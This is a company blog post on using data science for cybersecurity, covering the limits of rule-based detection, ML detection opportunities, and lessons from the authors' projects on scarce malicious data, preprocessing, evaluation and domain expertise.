Data Science for Cybersecurity

Alicja Dobrzeniecka & Marvin Straathof @

Sep 4, 2023 3:08:18 PM

Cyber attacks can cause devastating financial loss. They can also have a negative impact on an organisation or an individual. In cybersecurity, new data points are coming in every day. There is a lot of data, but when analysts look at data sample by sample, there is no guarantee that all available insights are captured. If we could harness these useful insights, we could better prepare for attacks and potentially reduce the number of devastating consequences. The aim of this article is to provide an overview of some existing challenges in cybersecurity, which we can potentially address using data science.

The power of the data science approach lies in looking at large samples of data as a whole and trying to uncover the overall patterns. Data science is the process of extracting insights, patterns and useful information from data to solve problems and make informed decisions. There is a growing interest in applying data science and machine learning solutions to the cyber security domain, in order to prevent malicious activity within a network.

Screenshot 2023-08-22 at 10.31.34

The aim of this article is to provide an overview of some existing challenges in cybersecurity, which we can potentially address using data science. In addition, the article highlights part of our journey at Hunt & Hackett, where we had previous experience in applying data science to various domains, but not to cybersecurity. We show what we have learned from our attempts to combine data science with cybersecurity. By sharing our experiences, we hope to help future data scientists better prepare for the challenges of cybersecurity.

Addressing Cybersecurity Challenges with Data Science

Traditional cybersecurity solutions include rule-based detection, where predefined rules are set up to detect specific types of malicious activity or attack patterns. These more traditional cybersecurity methods have limitations:

Limitations

[Predefined detection rules] - They rely on predefined, often manually created rules, and as cyber threats evolve rapidly, these rules may not cover all possible attack scenarios (e.g. novel or zero-day attacks).
[Balancing true & false positives] - It is a challenge to create rules that are both specific enough to detect threats and general enough to avoid false positives. As a result, some rules may generate too many false positives.
[Necessity of rule maintenance] - Rules may need to be adjusted over time, and maintaining and updating them on a regular basis is energy- and time-consuming.
[Detection blind spots exist] - There are blind spots because rule-based detection focuses on specific aspects of cyber security, which means it may miss attacks that exploit vulnerabilities outside the scope of the rules.

There are a number of challenges that can be potentially addressed with more data-driven approach. These include:

Opportunities

[Intrusion Detection] - We can use anomaly detection algorithms to build models that can detect deviations from normal network behaviour, where unusual patterns could indicate potential intrusions.
[Malware Detection] - We can use machine learning approaches to train models to detect malware based on features extracted from files, network traffic or system behaviour.
[Fraud Detection] - We can apply anomaly detection techniques to identify unusual patterns that may indicate malicious activity.
[Phishing Detection] - We can use natural language processing to analyse email content and identify suspicious or phishing-related keywords, links, and patterns that deviate from normal behaviour.
[Vulnerability Assessment] - We can use machine learning algorithms to predict potential vulnerabilities based on historical data and system configuration.

The cyber security landscape is dynamic. New ideas and techniques for hacking systems can emerge unexpectedly. Attackers can also take advantage of available machine learning solutions. Using data science approaches to detect malicious behaviour can provide a way to update existing solutions with new data. As an organisation's network changes over time, the model can keep pace by using new data. If the infrastructure is well prepared, deploying a new version of a model can be relatively simple compared to updating manually created rules.

This doesn't mean that manually created rules are useless, but each solution has a specific problem space for which it works best. The addition of data science fills a problem space that is difficult to solve with traditional rules. This also means that traditional rules can be used by data science as one of the inputs. Ultimately, a layered approach to intrusion detection should be adopted. This means selecting the best solution for each specific problem space. This may include a single method or more complex ensemble methods to tackle problems with different approaches at different stages.

What surprised us during the process?

While working on our data science for cyber security projects, we came across a number of challenges that seemed strongly related to the cyber domain.

A/ Data quality

Initially, we focused on collecting benign and malicious examples for our problem, with the idea of doing supervised learning. We thought that we could collect a good representation of malicious examples to train a model to distinguish between normal and abnormal behaviour. It turned out that there are far fewer malicious examples than we expected in both private and public datasets, for example from the Nishang public dataset, we were able to extract about 200 malicious Powershell commandlines which was much less than we expected to find. It now seems that unsupervised or self-supervised approaches may be better suited to many cyber tasks. The reason for this is that malicious events are quite rare, so it may be more appropriate to train a model to simply learn the patterns of normal behaviour (since we have lots of "normal" data), and then label any new sample that deviates significantly from that as anomalous.

B/ Data processing

Our initial assumption was that we could do the preparation and cleaning of the data more or less automatically, and that we would not run into problems with extracting features from the data. However, we did run into problems with one of the projects where we wanted to classify whether a given command line was malicious or not. This involved standardizing the data, removing noise and breaking it down into proper tokens that could be used as input features for a model. In the end, we had a pre-processing pipeline that was partly manually created to clean the data.

C/ Evaluation challenges

For tasks that involve predicting the type of a connection within a network, whether it is normal or abnormal, we encountered the problem of a limited amount of labelled data for evaluation. For an unsupervised model, we assume (e.g. after verification with cyber experts) that a part of the historical data represents "normal" behaviour. The challenge then becomes how to comprehensively evaluate the trained model to best understand its promises and limitations. One possible solution is to generate a set of "normal" and "abnormal" samples, either automatically or manually with domain experts. However, this can be time and energy consuming, so it should be well planned into the project spend.

D/ Importance of domain expertise

To work effectively with data, it is essential to have at least a basic understanding of the cyber security landscape. However, even after grasping the basic concepts, we often find ourselves relying on the expertise of cyber domain experts at different stages of projects. The cyber security domain can be challenging, especially for beginners. As data scientists, we may spend a lot of time immersed in it, but certain intricacies can only be fully understood with the guidance of an expert. Some corner cases may depend on specific contexts and require a broader understanding of the domain for proper interpretation.

Conclusion

In our journey so far we have encountered a number of challenges that have led to many lessons and ideas for the future. For the problem of limited number of malicious examples, we think that a good research direction is to go for the unsupervised approaches that can model the historical 'normal' behaviour and detect any suspicious deviations from it. Data processing made us aware that there are many ways to standardize cyber data and that the choice of method can directly affect the results. We also found that in order to further understand and improve your models, it may be necessary to work closely with cyber domain experts, sharing thoughts on progress so far and analysing corner cases together.

Finally, if you're a data scientist yourself, should you get into cybersecurity? If you like challenges, cybersecurity data science is a rewarding experience. Working with cyber data exposes a data scientist to real-world challenges that you wouldn't normally encounter when working with data that is simple, clean and readily available. By overcoming these challenges, you can gain valuable insights and develop a more realistic understanding of what it really means to be involved in data science. It will allow you to expand your skill set, overcome obstacles and navigate complex scenarios, ultimately enhancing your expertise in the field.

References

[1] https://journalofbigdata.springeropen.com/articles/10.1186/s40537-020-00318-5

[2] https://medium.com/codex/data-science-for-cyber-security-32e2f81e15d3

[3] https://medium.com/@jasonrbodie/use-data-science-in-cybersecurity-complete-guide-466e432d4547

Detection data sources Data science